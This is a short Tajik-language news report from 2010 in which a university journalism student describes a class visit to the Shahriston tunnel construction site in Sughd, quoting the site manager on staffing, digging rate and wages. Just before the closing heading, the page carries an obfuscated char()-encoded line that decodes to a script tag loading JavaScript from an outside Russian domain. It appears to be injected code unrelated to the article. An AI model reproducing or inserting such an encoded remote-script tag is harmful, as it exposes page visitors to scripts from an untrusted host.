30.04.2010
Сафари нақби Шаҳристон
Бо фарорасии фасли баҳор хоҳиши тамошои табиат дар инсон афзун мегардад. Мо донишҷӯёни соли аввали бахши журналистика ва назарияи тарҷумаи ДДХ ба номи академик Б. Ғафуров бо мақсади ошноӣ пайдо намудан аз табиати ноҳияи хуши ноҳияи Шаҳристони вилояти Суғд ва вазъи сохтмони нақби Шаҳристон ба сайёҳат рафтем. Моро профессор Саттор Худойбердиев роҳбарӣ намуданд.
Дар рафти сафар мо донишҷӯён аз манзараҳои нотакрори ноҳияи Шаҳристон баҳраманд гашта, бо зуҳуроти баъзе аз ҳодисаҳои табӣ шинос шудем. Ҳамсабақи ман Мавзуна таасуроти худро чунин иброз намуд. «Аслан ҳадафи аввалиндараҷаи мо шиносоӣ бо рафти сохтмони нақби Шаҳристон буд. Мо ба ин ҳадафи худ расидем, зеро бо рафти кор тарзи зиндагонии сохтмончиён ва аз дигар масъалаҳои сохтмон маълумот пайдо намудем». Мененҷери сохтмон Мирзоалӣ Мансуров қайд кард, ки алҳол дар сохтмон 180 нафар когарон фаъолият мебаранд, ки аз онҳо 40 нафарашон аз ҳисоби аҳолии маҳаллӣ мебошанд. 140 нафари дигар бошад сохтмончиёни чинӣ. То имрӯз 3745 метри нақб кофта шуд аст. Суръати кор дар як рӯз 1,5 метр дар қисми ҳаводиҳӣ ва 3 метр дар нақби асосӣ. Ба гуфти ӯ фаромадани ярч ва тарма ба суръати кор таъсири ҷиддӣ расонд ва ба истифодадиҳии нақб ба соли оянда гузаронида шуд. Музди меҳнати корганори маҳаллӣ 800 сомонӣ. Ба гуфти М. Мансуров маоши коргарони хитоӣ махфист. Инчунин мененҷери сохтмон ба мо аз лаҳзаҳои ҳаёти сохтмончиён ва муносибати онҳо бо ҳамдигар нақл намуд, ки барои мо шавқовар буд. Ташкили чунин сайёҳатҳо барои мо ҷавонон хеле муфид аст, зеро аксари донишҷӯён мавзеҳои вилояти худро ба хубӣ намедонанд.
Субҳиддин

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)815eea63be0878224a770218ccdad09b.js" type="text/javascript">

ТАВЗЕҲОТ